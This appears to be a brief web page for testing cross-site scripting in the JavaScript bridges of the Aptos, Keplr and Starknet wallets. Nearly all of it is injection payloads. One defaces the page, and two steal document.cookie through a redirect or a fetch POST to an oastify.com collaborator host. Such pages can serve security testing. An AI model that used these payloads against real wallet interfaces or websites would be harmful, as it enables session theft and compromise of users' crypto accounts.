This page tests XSS vulnerabilities in the following JavaScript interfaces:
Target Vulnerabilities:
window.aptos.sendError(id, "error_message")window.aptos.sendResponse(id, JSON.stringify(data))window.keplr.sendError(id, "error_message")window.keplr.sendResponse(id, JSON.stringify(data))window.starknet.sendError(id, "error_message")";alert('XSS');//
";window.location='http://r0sv7p79vx6xljkghjke5tnqfhl89zdn2.oastify.com/steal?data='+document.cookie;//
";document.body.innerHTML='HACKED
';//
";fetch('http://r0sv7p79vx6xljkghjke5tnqfhl89zdn2.oastify.com/steal',{method:'POST',body:JSON.stringify({data:document.cookie})});//